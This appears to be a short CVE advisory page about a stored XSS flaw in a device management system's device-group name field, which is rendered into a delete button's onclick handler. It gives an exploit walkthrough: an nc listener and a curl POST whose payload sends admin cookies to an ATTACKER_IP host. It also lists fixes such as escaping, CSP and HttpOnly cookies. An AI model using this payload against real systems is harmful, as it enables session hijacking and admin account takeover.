(Platform name not specified), Stored Cross-Site Scripting (XSS) vulnerability in Device Groups (Medium)

Listen to this Post

How the Mentioned CVE Works

The vulnerability is a stored Cross-Site Scripting (XSS) issue existing in the device group creation functionality. An attacker with admin privileges sends an HTTP POST request to the “/device-groups” URI. The “name” parameter in this request is not sanitized of HTML or JavaScript-related characters. When the device group is saved, its malicious name is stored in the database. Later, when an administrator views the device groups page, the application uses a Blade template (resources/views/device-group/index.blade.php) to render the interface. This template directly embeds the unsanitized device group name into the `onclick` event of the corresponding “Delete” button for that group. Consequently, when any administrator hovers over or clicks the delete button (triggering the `onclick` event), the injected JavaScript payload executes in their browser session, leading to the theft of session cookies and potential account takeover.

dailycve form:

Platform: Device Management System
Version: Not specified
Vulnerability: Stored XSS
Severity: Medium
date: 2026-02-18

Prediction: 2-4 weeks

What Undercode Say:

Analytics:

Authenticated admin POST. Unsanitized name input. Stored in database. Rendered in onclick event. Executes in victim browser. Steals authentication cookies.

How Exploit:

1. Start a listener on attacker machine to receive cookies
nc -lvnp 80
2. Use curl to create a malicious device group
curl -X POST http://target.com/device-groups \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: [bash]' \
-d "name=12345');var pt=new Image();pt.src='http://ATTACKER_IP/cookie-'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345&conditional_input=access_points.accesspoint_id&conditional_value=1"
3. Victim admin views groups and clicks delete
4. Check listener for exfiltrated cookies

Protection from this CVE

1. Input Sanitization (Example in PHP/Laravel)
use IlluminateSupportStr;
$safe_name = htmlspecialchars($request->input('name'), ENT_QUOTES, 'UTF-8');
2. Output Encoding (Blade Template Fix)
Change from:
onclick="delete_dg(this, '{{$device_group->name }}', ...)"
To:
onclick="delete_dg(this, '{{ htmlspecialchars($device_group->name) }}', ...)"
3. Content Security Policy (CSP) Header
header("Content-Security-Policy: script-src 'self'; img-src 'self'");
4. HttpOnly and Secure Cookie Flags
In config/session.php
'http_only' => true,
'secure' => env('SESSION_SECURE_COOKIE', true),

Impact:

Session hijacking. Admin account takeover. Unauthorized device management. Configuration changes. Data breach.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top